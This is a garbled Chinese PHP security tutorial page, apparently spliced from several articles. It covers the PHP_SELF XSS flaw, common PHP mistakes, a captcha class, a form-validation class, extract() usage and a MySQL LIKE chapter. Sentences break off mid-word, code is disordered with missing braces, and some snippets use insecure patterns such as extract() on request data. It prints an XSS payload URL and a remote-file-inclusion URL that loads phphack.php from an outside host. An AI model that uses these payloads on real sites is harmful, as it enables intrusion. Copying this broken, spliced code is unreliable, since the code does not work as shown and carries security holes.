php 安全漏洞 $_SERVER[’PHP_SELF’]
$_SERVER[’PHP_SELF’]在开发的时候常会用到,一般用来引用当前网页地址,并且它是系统自动生成的全局变量,也会有什么问题么?让我们先看看下面的代码吧:
<form action=”<?php echo $_SERVER[’PHP_SELF’]; ?>”>
<input type=”submit” name=”submit” value=”submit” />
</form>
这段代码非常简单,我们想用$_SERVER[’PHP_SELF’]来让网页提交时提交到它自己,假设代码文件名为test.php,在执行的时候就一定会得到我们期望的地址么?首先试试地址http://…/test.php,结果当然是没有问题的啦,别着急,你再访问一下http://…/test.php/a=1,将会得到如下客户端代码:
<form action=”/fwolf/temp/test.php/a=1″>
<input type=”submit” name=”submit” value=”submit” />
</form>
显然,这已经超出了我们的期望,web服务器居然没有产生诸如404之类的错误,页面正常执行了,并且在生成的html代码中居然有用户可以输入的部分,恐怖的地方就在这里。别小看那个“a=1”,如果把它换成一段js代码,就显得更危险了,比如这么调用:
http://…/test.php/%22%3E%3Cscript%3Ealert(’xss’)%3C/script%3E%3Cfoo
是不是看到了js的alert函数执行的效果?检查一下生成的html源代码找找原因吧。
通过这种嵌入js代码的方式,攻击者能 php 程序常犯错误总结 1.不转意html entities 2. 不转意SQL输入 3.错误的使用HTTP-header 相关的函数: header(), session_start(), setcookie() 每次从服务器下载一个网页的时候,服务器的输出都分成两个部分:头部和正文。 如何修复: 5. 语法错误 6.很少使用或不用面向对象 7. 不使用framework 8. 不知道PHP中已经有的功能 9.使用旧版本的PHP 很多程序员还在使用PHP4,在PHP4上开发不能充分发挥PHP的潜能,还存在一些安全的隐患。转到PHP5上来吧,并不费很多功夫。大部分PHP4程序只要改动很少的语句甚至无需改动就可以迁移到PHP5上来。根据http://www.nexen.net的调查 只有12%的PHP服务器使用PHP5,所以有88%的PHP开发者还在使用PHP4. 10.对引号做两次转意 见过网页中出现'或'"吗?这通常是因为在开发者的环境中magic_quotes 设置为off,而在部署的服务器上magic_quotes =on. PHP会在 GET, POST 和 COOKIE中的数据上重复运行addslashes() 。 magic quotes on : HTML输出: php 图形验证码类 <?php session_start(); $vi = new vCodeImage; $vi->SetImage(1,4,65,20,80,1); class vCodeImage{ /******************************************************* **FILENAME: verify_image.php **COPYRIGHT: NONE! (但请保留此信息) **AUTHOR: vsFree.Com **DATE: 2007-08-08 ********************************************************/ var $mode; //1:数字模式,2:字母模式,3:数字字母模式,其他:数字字母优化模式 var $v_num; //验证码个数 var $img_w; //验证码图像宽度 var $img_h; //验证码图像高度 var $int_pixel_num; //干扰像素个数 var $int_line_num; //干扰线条数 var $font_dir; //字体文件相对路径 var $border; //图像边框 var $borderColor; //图像边框颜色 function SetImage($made,$v_num,$img_w,$img_h,$int_pixel_num,$int_line_num,$font_dir='../font',$border=true,$borderColor='255,200,85'){ if(!isset($_SESSION['vCode'])){ session_register('vCode'); } $_SESSION['vCode']=""; $this->mode = $made; $this->v_num = $v_num; $this->img_w = $img_w; $this->img_h = $img_h; $this->int_pixel_num = $int_pixel_num; $this->int_line_num = $int_line_num; $this->font_dir = $font_dir; $this->border = $border; $this->borderColor = $borderColor; $this->GenerateImage(); } function GetChar($mode){ if($mode == "1"){ $ychar = "0,1,2,3,4,5,6,7,8,9"; } else if($mode == "2"){ $ychar = "A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z"; } else if($mode == "3"){ $ychar = "0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z"; } else $ychar = "3,4,5,6,7,8,9,A,B,C,D,H,K,P,R,S,T,W,X,Y"; return $ychar; } function RandColor($rs,$re,$gs,$ge,$bs,$be){ $r = mt_rand($rs,$re); $g = mt_rand($gs,$ge); $b = mt_rand($bs,$be); return array($r,$g,$b); } function GenerateImage(){ $im = imagecreate($this->img_w,$this->img_h); $black = imagecolorallocate($im, 0,0,0); $white = imagecolorallocate($im, 255,255,255); $bgcolor = imagecolorallocate($im, 250,250,250); imagefill($im,0,0,$bgcolor); $fonts = ScanDir($this->font_dir); $fmax = count($fonts) - 2; $ychar = $this->GetChar($this->mode); $list = explode(",",$ychar); $x = mt_rand(2,$this->img_w/($this->v_num+2)); $cmax = count($list) - 1; $v_code = ''; for($i=0;$i<$this->v_num;$i++) //验证码 { $randnum = mt_rand(0,$cmax); $this_char = $list[$randnum]; $v_code .= $this_char; $size = mt_rand(intval($this->img_w/5),intval($this->img_w/4)); $angle = mt_rand(-20,20); $y = mt_rand(($size+2),($this->img_h-2)); if($this->border) $y = mt_rand(($size+3),($this->img_h-3)); $rand_color = $this->RandColor(0,200,0,100,0,250); $randcolor = imagecolorallocate($im,$rand_color[0],$rand_color[1],$rand_color[2]); $fontrand = mt_rand(2, $fmax); $font = "$this->font_dir/".$fonts[$fontrand]; imagettftext($im, $size, $angle, $x, $y, $randcolor, $font, $this_char); $x = $x + intval($this->img_w/($this->v_num+1)); } for($i=0;$i<$this->int_pixel_num;$i++){//干扰像素 $rand_color = $this->RandColor(50,250,0,250,50,250); $rand_color_pixel = imagecolorallocate($im,$rand_color[0],$rand_color[1],$rand_color[2]); imagesetpixel($im, mt_rand()%$this->img_w, mt_rand()%$this->img_h, $rand_color_pixel); } for($i=0;$i<$this->int_line_num;$i++){ //干扰线 $rand_color = $this->RandColor(0,250,0,250,0,250); $rand_color_line = imagecolorallocate($im,$rand_color[0],$rand_color[1],$rand_color[2]); imageline($im, mt_rand(0,intval($this->img_w/3)), mt_rand(0,$this->img_h), mt_rand(intval($this->img_w - ($this->img_w/3)),$this->img_w), mt_rand(0,$this->img_h), $rand_color_line); } if($this->border) //画出边框 { if(preg_match("/^d{1,3},d{1,3},d{1,3}$/",$this->borderColor)){ $borderColor = explode(',',$this->borderColor); } $border_color_line = imagecolorallocate($im,$borderColor[0],$borderColor[1],$borderColor[2]); imageline($im, 0, 0, $this->img_w, 0, $border_color_line); //上横 imageline($im, 0, 0, 0, $this->img_h, $border_color_line); //左竖 imageline($im, 0, $this->img_h-1, $this->img_w, $this->img_h-1, $border_color_line); //下横 imageline($im, $this->img_w-1, 0, $this->img_w-1, $this->img_h, $border_color_line); //右竖 } imageantialias($im,true); //抗锯齿 $time = time(); $_SESSION['vCode'] = $v_code."|".$time; //把验证码和生成时间负值给$_SESSION[vCode] //生成图像给浏览器 if (function_exists("imagegif")) { header ("Content-type: image/gif"); imagegif($im); } elseif (function_exists("imagepng")) { header ("Content-type: image/png"); imagepng($im); } elseif (function_exists("imagejpeg")) { header ("Content-type: image/jpeg"); imagejpeg($im, "", 80); } elseif (function_exists("imagewbmp")) { header ("Content-type: image/vnd.wap.wbmp"); imagewbmp($im); } else die("No Image Support On This Server !"); imagedestroy($im); } } php 表单敏感字符过滤代码 public function formHtml($array,$infoArray='') } foreach ($valarray as $key =>$varl) if($key >'0') // 演示: // 表单提交效验 我们可以使用extract()函数,比如在接收页面脚本的最前面加上extract($_POST);extract($_GET);这样的语句,导出几个用于表单处理的超级变量数组值,如以下代码所示: @extract(i_addslashes($_POST), EXTR_OVERWRITE); 我们看一个使用extract导出为正常变量的脚本例子
一个基本的常识:所有不可信任的输入(特别是用户从form中提交的数据) ,输出之前都要转意。
echo $_GET['usename'] ;
这个例子有可能输出:
<script>/*更改admin密码的脚本或设置cookie的脚本*/</script>
这是一个明显的安全隐患,除非你保证你的用户都正确的输入。
如何修复 :
我们需要将"< ",">","and" 等转换成正确的HTML表示(< , >', and "),函数htmlspecialchars 和 htmlentities()正是干这个活的。
正确的方法:
echo htmlspecialchars($_GET['username'], ENT_QUOTES);
我曾经在一篇文章中最简单的防止sql注入的方法(php+mysql中)讨论过这个问题并给出了一个简单的方法 。有人对我说,他们已经在php.ini中将magic_quotes设置为On,所以不必担心这个问题,但是不是所有的输入都是从$_GET, $_POST或 $_COOKIE中的得到的!
如何修复:
和在最简单的防止sql注入的方法(php+mysql中)中一样我还是推荐使用mysql_real_escape_string()函数
正确做法:
<?php
$sql = "UPDATE users SET
name='.mysql_real_escape_string($name).'
WHERE id='.mysql_real_escape_string ($id).'";
mysql_query($sql);
?>
遇到过这个警告吗?"warning: Cannot add header information - headers already sent [....]
头部包含了一些非可视的数据,例如cookie。头部总是先到达。正文部分包括可视的html,图片等数据。
如果output_buffering设置为Off,所有的HTTP-header相关的函数必须在有输出之前调用。问题在于你在一个环境中开发,而在部署到另一个环境中去的时候,output_buffering的设置可能不一样。结果转向停止了,cookie和session都没有正确的设置........。
确保在输出之前调用http-header相关的函数,并且令output_buffering = Off
4. Require 或 include 的文件使用不安全的数据
再次强调:不要相信不是你自己显式声明的数据。不要 Include 或 require 从$_GET, $_POST 或 $_COOKIE 中得到的文件。
例如:
index.php
<?
//including header, config, database connection, etc
include($_GET['filename']);
//including footer
?>
现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt
来获取你的机密信息,或执行一个PHP脚本。
如果allow_url_fopen=On,你更是死定了:
试试这个输入:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php
现在你的网页中包含了http://www.youaredoomed.com/phphack.php的输出. 黑客可以发送垃圾邮件,改变密码,删除文件等等。只要你能想得到。
如何修复:
你必须自己控制哪些文件可以包含在的include或require指令中。
下面是一个快速但不全面的解决方法:
<?
//Include only files that are allowed.
$allowedFiles = array('file1.txt','file2.txt','file3.txt');
if(in_array((string)$_GET['filename'],$allowedFiles)) {
include($_GET['filename']);
}
else{
exit('not allowed');
}
?>
语法错误包括所有的词法和语法错误,太常见了,以至于我不得不在这里列出。解决办法就是认真学习PHP的语法,仔细一点不要漏掉一个括号,大括号,分号,引号。还有就是换个好的编辑器,就不要用记事本了!
很多的项目都没有使用PHP的面向对象技术,结果就是代码的维护变得非常耗时耗力。PHP支持的面向对象技术越来越多,越来越好,我们没有理由不使用面向对象。
95% 的PHP项目都在做同样的四件事: Create, edit, list 和delete. 现在有很多MVC的框架来帮我们完成这四件事,我们为何不使用他们呢?
PHP的核心包含很多功能。很多程序员重复的发明轮子。浪费了大量时间。编码之前搜索一下PHP mamual,在google上检索一下,也许会有新的发现!PHP中的exec()是一个强大的函数,可以执行cmd shell,并把执行结果的最后一行以字符串的形式返回。考虑到安全可以使用EscapeShellCmd()
原始文本:
It's a string
It's a string
又运行一次
addslashes():
It\'s a string
It's a string
<img src="verify_image.php" alt="点此刷新验证码" name="verify_code" width="65" height="20" border="0" id="verify_code" onclick="document.getElementById('verify_code').src='verify_image.php?'+Math.random();" style="cursor:pointer;" />
复制代码字体文件见附件!
/**
* 表单生成验证文件
*/
$_form = new formHtmlFind();
class formHtmlFind{
/**
* 输出表单函数
* $formKey 表单键
* $infoArray 更新时的原始信息数组
*/
{
// 检测数组是否存在
if(empty($array))return false;
$newform = null;
// 信息数组(更新信息)
$this->infoArray = !empty($infoArray)?$infoArray:array();
$this->array['class'] = get_class_methods(get_class());
foreach ($array as $key =>$arr)
{
// 键值转换为纯英文
$key = preg_replace("/[^a-z]/i",'',$key);
// 生成表单
$newform .= $this->outputForm($arr,$key);
}
// 输出表单
return $newform.$this->jsError();
}
/**
* 生成表单函数
*/
private function outputForm($arr,$key)
{
$value = null;
if(empty($arr))return false;
// input Type
$type = $key;
// input NAME
$name = trim($arr[0]);
// input 初始值 不包含多选,单选类
$value = (!empty($this->infoArray[$name]))? trim($this->infoArray[$name]):trim($arr[1]);
$value = empty($this->post[$name])? $value :trim($this->post[$name]);
// input Title
$title = trim($arr[2]);
// 样式
$style = trim($arr[3]);
if($key!=="hidden")
{
$dt = "<dt>{$title}</dt><dd>";
// js错误提示
$dd = "<tt id="J{$name}"></tt></dd>rn";
}
return (!preg_match("/checkbox|select|radio/i",$key))?
$dt.$this->newInput($type,$name,$value,$style,$title).$dd:
$this->formSelect($type,$name,$arr[1],$title,$style); // 多选类
}
/**
* 提交数据检测
*/
public function postForm($array)
{
// 检测数组是否存在
if(empty($array)||empty($_POST))return false;
$this->post = $_POST;
$this->array['class'] = get_class_methods(get_class());
foreach ($array as $key =>$arr)
{
// 键值转换为纯英文
$key = preg_replace("/[^a-z]/i",'',$key);
// 检测 注销file类表单
if (!empty($arr)&&'file' != $key)$newData[trim($arr[0])] = $this->postFind($arr,$key);
}
// 输出表单
if(!empty($this->error))
{
return false;
}
else return $newData;
}
/**
* 生成表单
*/
private function newInput($type,$name,$value,$style,$title)
{
switch ($type)
{
case 'text':
// 单行文本
return "<input type="text" name="{$name}" value="{$value}" {$style}/>";
break;
case 'password':
//密码输入
return "<input type="password" name="{$name}" {$style}/>";
break;
case '':
//多行文本
return "<textarea name="{$name}" {$style}/>{$value}</textarea>";
break;
case 'hidden':
// 隐藏
return "<input type="hidden" name="{$name}" value="{$value}" {$style}/>";
break;
case 'file':
// 文件上传
return "<input type= "file"name="{$name}" {$style}/>";
break;
case 'submit':
// 提交
return "<input type="submit" name="{$name}" value="$value" $style}/>";
break;
default:
return "{$type}类型错误!!!";
break;
}
}
/**
* 提交信息检测
* 错误返回error
*/
private function postFind($arr,$key)
{
if(empty($arr))return false;
$name = $title =$error =$find =$standard =null;
// input NAME
$name = trim($arr[0]);
// input Title
$title = trim($arr[2]);
// 错误提示
$error = trim($arr[4]);
// 检测类型 Y N
$find = trim($arr[5]);
// 检测标准
$standard = trim($arr[6]);
//
if(!empty($standard))$this->error .=$this->ck_split($standard,$name,$title,$find,$error);
// 转换为字符串
if(is_array($this->post[$name]))$this->post[$name] = implode(",",$this->post[$name]);
// 转义或其他转化
$KKarray = array();
if(preg_match("/Y|N/is",$find))
{
$KKarray = split("_", $find);
// 转义或过滤
$escape_filter = (!empty($KKarray[1]))?'ck_'.$KKarray[1]:'';
// 输出通过检测的合法数据
$data = ($escape_filter)?$this->$escape_filter($this->post[$name]):$this->post[$name];
else $data = "";
// 输出新的数据
return $data;
}
/**
* 多选类表单生成
*/
private function formSelect($type,$name,$value,$title,$style)
{
$outform = null;
// 触发更新和提交动作时的初始
$nowvalue = (!empty($this->post[$name]))?$this->post[$name]:$this->infoarray[$name];
// 兼容多选的识别,转为数组
if(!empty($nowvalue))$valueArray = explode(",",$nowvalue);
// 选项标题
if(is_array($title))
{
array_unshift($title,'选择');
$titarray = array_values($title);
}else $titarray = explode("|",$title);
// 选项值
if(is_array($value))
{
array_unshift($value,'选择');
$valarray = array_keys($value);
if(empty($title))$titarray = array_values($value);
}
else $valarray = explode("|",$value);
// 取消表单的初始默认值
if(!empty($this->post)&&!empty($this->infoArray))$value = preg_replace("/Y_/i",'',$value);
{
// 非默认的识别
if(!empty($valueArray))$select = (in_array($varl,$valueArray))?'Y':'';
// 判断是否为默认
else $select = (eregi("Y_",$varl))? 'Y':'';
{
$_title=($titarray[$key])? $titarray[$key]:$title;
switch ($type)
{
case 'select':
if('Y' == $select)$select = 'selected';
$outform .= sprintf("<option %s value="%s"/>%s</option>rn"
,$select,preg_replace("/Y_/i",'',$varl),$_title);
break;
case 'radio':
if('Y' == $select)$select = 'checked';
$outform .= sprintf("<label>%s<input %s type="radio" name="%s" value="%s" %s/></label>rn",
$_title,$select,$name,$varl,$style);
break;
case 'checkbox':
if('Y' == $select)$select = 'checked';
$outform .= sprintf("<label>%s<input %s type="checkbox" name="%s[]" value="%s" %s/></label>rn",$_title,$select,$name,$varl,$style);
break;
}
$select =null;
}
}
// 下拉选择
if($type =='select')$outform = sprintf('<select name="%s" %s>%s</select>',$name,$style,$outform);
return sprintf("<dt>%s</dt><dd>%s<tt id="J%s"></tt></dd>rn",$titarray[0],$outform,$name);
}
/**
* 表单验证 及全部 ck_类函数
*/
private function ck_split($standard,$name,$title,$find,$error)
{
// 非必填缺省跳过
if(eregi('N',$find) && empty($this->post[$name]))return false;
// 必填缺省检测
if(eregi('Y',$find) && empty($this->post[$name]))return "["J{$name}","$error"],";
$t_error = null;
// 多项检测
$arr = explode(',',$standard);
// POST数据检测
if(!empty($arr))foreach ($arr as $var)
{
if(trim($var)!='')
{
switch ($this->post)
{
case is_array($this->post[$name]):
// 数组类的检测
foreach ($this->post[$name] as $_var)
{
$t_error.= ($this->ck_open($_var,trim($var)))?"":$error;
if($t_error)break;
}
break;
default:
$t_error.= ($this->ck_open($this->post[$name],trim($var)))?"":$error;
break;
}
if($t_error)break;
}
}
return ($t_error)? "["J{$name}","$t_error"],":"";
}
// 函数调用
private function ck_open($string,$str)
{
$functi = $this->ck_detected($str);
return ($this->$functi($string,$str))? true:false;
}
// 类型判断
private function ck_detected($str)
{
$detect = (eregi("^[a-zA-Z]*$",$str))? "{$str}Detect":'lengthDetect';
if(!in_array($detect,$this->array['class']))
{
location('index.php',$ck,' Lack of function !!!');
}
return $detect;
}
//-------------------------------------以下为检测函数可外部调用
// 长度
public function lengthDetect($string,$str){
$len = split('-',trim($str));
return (strlen($string) > ($len[0]-1) && strlen($string) < ($len[1]+1))? true:false;
}
// 价格
public function moneyDetect($str){
return preg_match("/^(-|+)?d+(.d+)?$/",$str);
}
// 邮件
public function emailDetect($str){
return preg_match("/^w+([-+.]w+)*@w+([-.]w+)*.w+([-.]w+)*$/", $str);
}
// 网址
public function urlDetect($str){
return preg_match("/^http://[A-Za-z0-9]+.[A-Za-z0-9]+[/=?%-&_~`@[]':+!]*([^<>"])*$/", $str);
}
// 数字型
public function numDetect($str){
return is_numeric($str);
}
// 中文
public function cnDetect($str){
return preg_match("/^[x7f-xff]+$/", $str);
}
// 字母
public function enDetect($str){
return preg_match("/^[A-Za-z]+$/", $str);
}
// 数字字母混合
public function numenDetect($str){
return preg_match("/^([a-zA-Z0-9_-])+$/",$str);
}
// 电话号码
public function telDetect($str){
return ereg("^[+]?[0-9]+([xX-][0-9]+)*$", $str);
}
// 敏感词
public function keyDetect($str){
return (!preg_match("/$badkey/i",$str));
}
//-----------------------------------------------------输出
// 字符替换
public function ck_filter($str){
$str=(is_array($str))? implode(",",$str):$str;
$str=nl2br($str); //将回车替换为<br>
$str=htmlspecialchars($str); //将特殊字元转成 HTML 格式。
//$str=str_replace(array(" ",'<? '),array(" ",'< ?'),$str); //替换空格替换为
return $str;
}
// 转义
function ck_escape($str)
{
if (!get_magic_quotes_gpc())return addslashes($str);
return $str;
}
// MD5加密
public function ck_md5($str){
return MD5($str);
}
// base64加密
public function ck_base64($str){
return base64_encode($str);
}
// 时间
function ck_time($str){
// time_r() 来在公用函数文件
if(!is_numeric($str))
{
return time_r($str);
}
else return $str;
}
// 有条件注销(数字)
public function ck_cancel($str){
return (!is_numeric($str))? $str:"";
}
// 无条件注销
public function ck_delete(){
return null;
}
// js错误提示
private function jsError()
{
if(empty($this->error))return false;
return "
<script language=javascript> rn var error = new Array(".trim($this->error,',').");
rn for (i=0; i < error.length; i++){
rn document.getElementById(error[0]).innerHTML=error[1];
}rn </script>
";
}
}
$form[1] =array(
'text'=>array('title','','产品名称','size=40','产品名称不可缺少!','Y','cn,1-30'),
'text1'=>array('categories','','产品名称','','','Y_base64'),
'select'=>array('superiors','||1|2|Y_3','产品类别|选择|1|2|3','','必选项','Y'),
'radio'=>array('superiors1','|1|Y_2|3','产品xun|产品1|产品2|产品3','','必选项','Y'),
'checkbox'=>array('superiors2',array(1=>'11',2=>'22',3=>'33'),'','','必选项','Y'),
'file'=>array('ddd','','文件'),
);
$form =array (
'login' =>
array (
'text' =>
array (
0 => 'user',
1 => '',
2 => '用户名',
3 => 'size=20',
4 => '!',
5 => 'Y',
6 => 'numen,6-12',
),
'password' =>
array (
0 => 'pass',
1 => '',
2 => '密 码',
3 => 'size=22',
4 => '密码格式错误!',
5 => 'Y_md5',
6 => 'numen,6-12',
),
'radio' =>
array (
0 => 'time',
1 => '|7200|3600|1800',
2 => 'cookies有效时间|2小时|1小时|30分钟',
3 => '',
4 => '',
5 => 'N_delete',
6 => '',
),
),
);
$past = $_form->postForm($form['login']);
$dd = array('title'=>'标题','categories'=>'类别');
// $dd 为已有的信息(如更新时的信息输出) POST数据位内部处理具有优先权
if(!empty($past))
{
echo "<pre>";
print_r($past);
echo"</pre>";
}
echo '<form method="POST" NAME="PostTopic" action="" enctype="multipart/form-data" style="margin:0px;">';
echo $_form->formHtml($form['login'],$dd);
echo '<input type="submit" value="Y" name="B1"></form>';
?>
@extract(i_addslashes($_GET), EXTR_OVERWRITE);
@extract(i_addslashes($_COOKIE), EXTR_OVERWRITE);
@extract(i_addslashes($_SESSION), EXTR_OVERWRITE);
<?php
// 将$_GET和$_POST超级变量数组获取的变量转为正常的变量,这样直接显示变量名称即可
extract($_GET);
extract($_POST);
echo "您好, $username $age";
?>
<form action="" method="post">
姓名:<input type="text" name="username" id="username" />
年龄:<select name="age">
<option value=">16">小于16</option>
<option value="16-30" selected>16-30</option>
<option value="31-50">31-50</option>
<option value="51-80">51-80</option>
</select></td>
<input type="submit" name="btn_submit" value="提交" />
</form>
实现的界面如图5-5所示。
本章介绍什么是通配符、如何使用通配符以及怎样使用LIKE操作符进行通配搜索,以便对数据进行复杂过滤。
8.1 LIKE操作符
前面介绍的所有操作符都是针对已知值进行过滤的。不管是匹配一个还是多个值,测试大于还是小于已知值,或者检查某个范围的值,共同点是过滤中使用的值都是已知的。但是,这种过滤方法并不是任何时候都好用。例如,怎样搜索产品名中包含文本anvil的所有产品?用简单的比较操作符肯定不行,必须使用通配符。利用通配符可创建比较特定数据的搜索模式。在这个例子中,如果你想找出名称包含anvil的所有产品,可构造一个通配符搜索模式,找出产品名中任何位置出现anvil的产品。
通配符(wildcard) 用来匹配值的一部分的特殊字符。
搜索模式(search pattern) 由字面值、通配符或两者组合构成的搜索条件。
通配符本身实际是SQL的WHERE子句中有特殊含义的字符,SQL支持几种通配符。
为在搜索子句中使用通配符,必须使用LIKE操作符。LIKE指示MySQL,后跟的搜索模式利用通配符匹配而不是直接相等匹配进行比较。
谓词 操作符何时不是操作符?答案是在它作为谓词(predi- cate)时。从技术上说,LIKE是谓词而不是操作符。虽然最终的结果是相同的,但应该对此术语有所了解,以免在SQL文档中遇到此术语时不知道。
8.1.1 百分号(%)通配符
最常使用的通配符是百分号(%)。在搜索串中,%表示任何字符出现任意次数。例如,为了找出所有以词jet起头的产品,可使用以下SELECT语句:
此例子使用了搜索模式'jet%'。在执行这条子句时,将检索任意以jet起头的词。%告诉MySQL接受jet之后的任意字符,不管它有多少字符。
区分大小写 根据MySQL的配置方式,搜索可以是区分大小写的。如果区分大小写,'jet%'与JetPack 1000将不匹配。
通配符可在搜索模式中任意位置使用,并且可以使用多个通配符。下面的例子使用两个通配符,它们位于模式的两端:
搜索模式'%anvil%'表示匹配任何位置包含文本anvil的值,而不论它之前或之后出现什么字符。
通配符也可以出现在搜索模式的中间,虽然这样做不太有用。下面的例子找出以s起头以e结尾的所有产品:
重要的是要注意到,除了一个或多个字符外,%还能匹配0个字符。%代表搜索模式中给定位置的0个、1个或多个字符。
注意尾空格 尾空格可能会干扰通配符匹配。例如,在保存词anvil时,如果它后面有一个或多个空格,则子句WHERE prod_name LIKE '%anvil'将不会匹配它们,因为在最后的l后有多余的字符。解决这个问题的一个简单的办法是在搜索模式最后附加一个%。一个更好的办法是使用函数(第11章将会介绍)去掉首尾空格。
注意NULL 虽然似乎%通配符可以匹配任何东西,但有一个例外,即NULL。即使是WHERE prod_name LIKE '%'也不能匹配用值NULL作为产品名的行。
相关文章
- Multipart/form-data是文件上传或数据提交时会用到了,在php中Multipart/form-data是有安全bug的,下面我们来看看如何修复Multipart/form-data的bug吧. 今天在乌云...2016-11-25
- 作为前端,一直以来都知道HTTP劫持与XSS跨站脚本、CSRF跨站请求伪造。防御这些劫持最好的方法是从后端入手,前端能做的太少。而且由于源码的暴露,攻击者很容易绕过防御手段。但这不代表我们去了解这块的相关知识是没意义的,本文的许多方法,用在其他方面也是大有作用。...2021-05-24
SQL Server中row_number函数的常见用法示例详解
这篇文章主要给大家介绍了关于SQL Server中row_number函数的常见用法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧...2020-12-08- 本文详细讲解了SQLServer中执行动态SQL的方法,文中通过示例代码介绍的非常详细。对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下...2022-05-19
- 这篇文章主要介绍了C#查询SqlServer数据库并返回单个值的方法,涉及C#操作SQLServer数据库查询的相关技巧,需要的朋友可以参考下...2020-06-25
SQL Server免费版的安装以及使用SQL Server Management Studio(SSMS)连接数据库的图文方法
这篇文章主要介绍了SQL Server免费版的安装以及使用SQL Server Management Studio(SSMS)连接数据库的图文方法,需要的朋友可以参考下...2020-07-11- 普通关闭 我的mysql是自己下载的tar包,自己设定安装目录来安装的。停止mysql服务,说来简单,但不知道的话,还真是挠头。在这和mysql入门的同学们共享:)正确方法是,进入mysql的bin目录下,然后执行./mysqladmin -uroot -p shut...2015-11-24
C#实现Excel表数据导入Sql Server数据库中的方法
这篇文章主要介绍了C#实现Excel表数据导入Sql Server数据库中的方法,结合实例形式详细分析了C#读取Excel表数据及导入Sql Server数据库的具体操作步骤与相关操作技巧,需要的朋友可以参考下...2020-06-25SQLServer 错误: 15404,无法获取有关 Windows NT 组/用户 WIN-8IVSNAQS8T7\Administrator 的信息
SQLServer 错误: 15404,无法获取有关 Windows NT 组/用户 'WIN-8IVSNAQS8T7\Administrator' 的信息,错误代码 0x534。 [SQLSTATE 42000] (ConnIsLoginSysAdmin)...2021-07-15- 这篇文章主要介绍了C#连接到sql server2008数据库的实例代码,需要的朋友可以参考下...2020-06-25
- 这篇文章主要介绍了C#实现线程安全的简易日志记录方法,比较实用的功能,需要的朋友可以参考下...2020-06-25
- 这篇文章主要介绍了C#编程实现连接SQL SERVER数据库的方法,以实例形式较为详细的分析了C#连接SQL SERVER数据库的相关步骤与具体实现技巧,需要的朋友可以参考下...2020-06-25
- 这篇文章主要给大家介绍了关于SQL SERVER迁移之更换磁盘文件夹的完整步骤,文中通过图文介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧...2020-12-08
- 这篇文章主要介绍了CentOS8安装SQLServer2019的步骤,本文通过命令实例相结合给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下...2020-07-11
- 系统:centos 5.9 环境:apache 2.2.25 tomcat 7.0.42 jdk 1.7.0 1.安装apache 我这里是直接yum安装的,如果你们要编译安装也不是不行. 代码如下 ...2016-01-28
- 本文将基于三大范式原则,结合具体的实例做简要分析,对SqlServer 数据库 三大 范式相关知识感兴趣的朋友一起看看吧...2020-07-11
- 这篇文章主要给大家介绍了关于sql server日志处理不当造成的隐患的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用sql server具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧...2020-07-11
- 这篇文章主要介绍了SQL server 自增ID--序号自动增加的字段操作,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧...2020-12-08
apache http server遇到了一个问题,需要关闭
重装系统后,重新安装了xamp,最近启动的时候经常报apache http server遇到了一个问题,需要关闭,显示如图: 解决方法:查看szModName报错的模块,然后把PHP安装目录下对应的模块...2016-01-28- 本篇文件将结合MSND简要分析Sqlserver中JSON函数,主要包括ISJSON,JSON_VALUE,JSON_MODIFY,JSON_QUERY,需要的朋友可以参考下...2020-07-11